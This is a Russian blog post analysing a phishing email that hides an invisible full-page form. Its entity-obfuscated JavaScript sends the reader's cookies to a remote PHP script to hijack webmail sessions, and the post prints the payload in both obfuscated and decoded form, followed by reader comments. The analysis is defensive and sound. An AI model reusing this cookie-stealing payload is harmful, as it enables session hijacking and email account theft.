Как взломать электронную почту Как создать свой сайт > Статьи > Как взламывают электронную почту?

Как взламывают электронную почту?

Завхоз 2-го дома Старсобеса был застенчивый ворюга.
Всё существо его протестовало против краж, но не красть он не мог.
Он крал, и ему было стыдно. Крал он постоянно, постоянно стыдился,
и поэтому его хорошо бритые щёчки всегда горели
румянцем смущения, стыдливости, застенчивости и конфуза.
«12 стульев», Илья Ильф, Евгений Петров.
20 августа 2012


    История попытки взлома электронной почты началась вот с этого твита Алаича:

Начало истории со взломом почты

    Я попросил его переслать мне в почту это письмо, было интересно посмотреть, как народ нынче развлекается. Через некоторое время я получил это письмо и открыл его посмотреть. Всё и вправду так, как говорят:

То самое письмо с хитрым скриптом

    Сразу же стало смешно — ну как так можно опростоволоситься с подписью? Школоло, ага. Ссылок в письме нет, это уже интересно. Открываем исходный код письма, и видим, понятное дело, что ни к ICQ, ни тем более к Webmoney Support это письмо не имеет никакого отношения:

1 Return-path: <webmaster@адрес_сайта.ру>

    Но это ерунда, так как в самом низу электронного письма притаился вот такой блок:

1

2












3



4
</div></div></div></div></div>

<form target="_self" action="&#x6A;&#x61;&#x76;&#x61;&#x73;
&#x63;&#x72;&#x69;&#x70;&#x74;:&#100&#101&#108&#102&#61&#100&
#111&#99&#117&#109&#101&#110&#116&#46&#103&#101&#116&#69&#108
&#101&#109&#101&#110&#116&#66&#121&#73&#100&#40&#39&#100&#101
&#108&#102&#39&#41&#59&#100&#101&#108&#102&#46&#115&#116&#121
&#108&#101&#46&#100&#105&#115&#112&#108&#97&#121&#61&#39&#110&#111
&#110&#101&#39&#59&#105&#109&#103&#61&#110&#101&#119&#32&#73&#109
&#97&#103&#101&#40&#41&#59&#105&#109&#103&#46&#115&#114&#99&#61
&#34&#104&#116&#116&#112&#58&#47&#47&#110&#111&#114&#100&#108&#97
&#110&#100&#55&#50&#46&#114&#117&#47&#99&#111&#114&#47&#115&#46
&#112&#104&#112&#63&#34&#43&#100&#111&#99&#117&#109&#101&#110&#116
&#46&#99&#111&#111&#107&#105&#101&#59" formtarget="_self">

<input id="delf" type=submit value="" style="filter:alpha(opacity=0);
-moz-opacity:0;opacity:0;&#x70;osition:absolute;z-index:9999999999999;
margin-left:-2000px;margin-top:-2000px;width:10000px;height:10000px;">

</form>

    Понятно, это HTML-Entities. Прогоняем через декодер HTML-Entities > UTF-8, и вот, код обретает уже более понятный вид:

1

2



3



4
</div></div></div></div></div>

<form target="_self" action="javascript:delf=document.getElementById('delf');
delf.style.display='none';img=new Image();img.src="http://адрес_сайта/cor/s.php?"
+document.cookie;" formtarget="_self">

<input id="delf" type=submit value="" style="filter:alpha(opacity=0);
-moz-opacity:0;opacity:0;position:absolute;z-index:9999999999999;
margin-left:-2000px;margin-top:-2000px;width:10000px;height:10000px;">

</form>

    Итак, что происходит. Джаваскрипт берёт куки активного документа и отправляет их скрипту, находящемуся по адресу: http://адрес_сайта/cor/s.php. Там злоумышленник эти куки принимает, и дальше юзает по назначению (читай получает доступ к электронному почтовому ящику атакуемого). В этом нехорошем деле засветилась кровельная компания ООО «Нордленд» (именно её адрес стоял вместо адрес_сайта). Домен зарегистрирован в 2007 году, поэтому делаю вывод, что их или взломали, или это SEO-войны какие-то.

    Данная модель взлома сработает только на тех, кто ходит в электронную почту через браузер и ставит галочку «запомнить пароль» при входе в почту. Но случай хоть и школьный, но забавный. Если бы не фейл с подписью и если бы жертва не юзала почтовый софт, а юзала бы браузер, всё могло бы закончиться гораздо печальнее и электронная почта была бы взломана.

P.S. В Твиттере высказывалась мысль о том, что, мол «ну там же ссылки нет, а раз нет ссылки — нет и фишинга». Как видите, чтобы взломать электронный почтовый ящик, в письме не обязательно должна быть ссылка. Достаточно хитрого скрипта.

    Если есть вопросы, или хотите обсудить, жду в комментариях.

UPD #1: PHP-шный скрипт, воровавший куки от электронной почты, оперативно потёрли.

Автор: Алекс Форк.

Оставить комментарий, поделиться мнением или задать вопрос...


Комментарии:

АлаичЪ
Спасибо Алексу за разъяснения. А еще до публикации поста Алекс позвонил мне , что меня очень удивило, кстати, и рассказал что это за потеха такая и что надо в первую очередь сделать, чтобы не .попасть под раздачу мошенников. Короче, двойной респект!

Алекс Форк
Всегда welcome :) Чем смогу — помогу.

wlad2
мне постоянно приходят такие письма и я в курсах что это.. но как мне кажется gmail умеет выключать iframe в письмах или я ошибаюсь?

Алекс Форк
Ошибаешься, т.к. iframe тут совершенно не причем.

wlad2
да я чет тупанул глянул а там пострашнее.. но все равно не могу понять разве браузеры да и сам гугл не умеют с этим боротся? у тебя лично уводили пасы?

Алекс Форк
Нет.

АлаичЪ
Знаешь что я вспомнил то. Сразу за первым письмом пришло второе. От имени якобы webmoney с содержанием в духе, вы два года назад завели себе кипер лайт и сейчас там кончается сертификат, если планируете пользоваться дальше, продлите еще на 2 года. Ссылки там на вебманевский сайт были. Но я сидел думал и решил что я вообще никогда ки пером этим не пользовался и письмо просто удалил.

Алекс Форк
Ну правильно все сделал. Если будут приходить еще какие-то подозрительные письма — присылай, разберем их на запчасти :)

wlad2
тоже вот последний месяц приходят такие месаги.. походу ломают тупо манимейкеров..

Константин
А у меня такая странность, пользуюсь яндекс.почтой через браузер (ff) и заметил неделю назад прикол, мне пишет письмо регистратор, мол повторите вопрос, мы не поняли что вы говорите, смотрю, я отправил ему письмо, на английском с какой то ссылкой потом смотрю таких писем улетело штук 10 и в каждом указано по 10 адресов из моей записной книги. Вот как так они овладели акком? Пароль сменил сразу как спалил, вроде прекратилось.

Алекс Форк
Вариантов может быть много. Угон кук, угон логина/пароля, и т.д.

Toxic_Cat
Мне регулярно приходят письма от webmaster@адрес_сайта.ру с различными текстами! Причем уже в течении нескольких месяцев!!! Почему этого вебмастера не отловят и не посадят на хрен? То от руцентра письмо, то от Webmoney, сегодня Счет на оплату пришел Охуевшие совсем стали! А знаете как я распознаю этого кидалу? У него в базе ДВА моих e-maila, соответственно два письма одинаковых мне приходит.

⇓ 

Поделись ссылкой на Seoded.ru с друзьями, знакомыми и собеседниками в соцсетях и на форумах! А сам сайт добавь в закладки! Так победим.

Поделиться ссылкой на эту страницу в:

Полезные ссылки:

На онлайн-играх может заработать любой... В декрете? Хочешь заработать? Узнай как...

Ещё материалы по этой теме:

Сервисный паразитизм Блогизация и СМИзация журналистов Флешмоб против Internet Explorer 6 Конвульсии информационной архитектуры Как обманывают в интернет-магазинах?
основан в 2008 г. © Все права на материалы сайта Seoded.ru принадлежат Алексею Вострову.
Копирование (полное или частичное) любых материалов сайта возможно только с разрешения автора и при указании ссылки на источник.
Ослушавшихся находит и забирает Бабайка!